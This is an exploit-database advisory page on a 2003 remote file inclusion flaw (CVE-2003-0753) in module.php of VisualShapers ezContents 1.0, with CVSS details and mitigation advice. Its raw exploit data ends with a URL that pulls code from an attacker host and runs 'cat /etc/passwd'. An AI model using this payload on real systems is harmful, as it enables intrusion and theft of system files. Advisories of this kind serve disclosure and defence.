header-logo
Suggest Exploit
vendor:
ezContents
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ezContents
Affected Version From: VisualShapers ezContents 1.0
Affected Version To: VisualShapers ezContents 1.0
Patch Exists: YES
Related CWE: CVE-2003-0753
CPE: o:visualshapers:ezcontents:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2003

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents

VisualShapers ezContents is vulnerable to a Remote File Inclusion vulnerability due to a lack of proper input validation. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to a victim. If the victim visits the malicious URL, the attacker's malicious code will be executed on the vulnerable system.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied input is properly validated and sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9396/info

A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems.

http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd

Navigation

Suggest Exploit

Services By CQR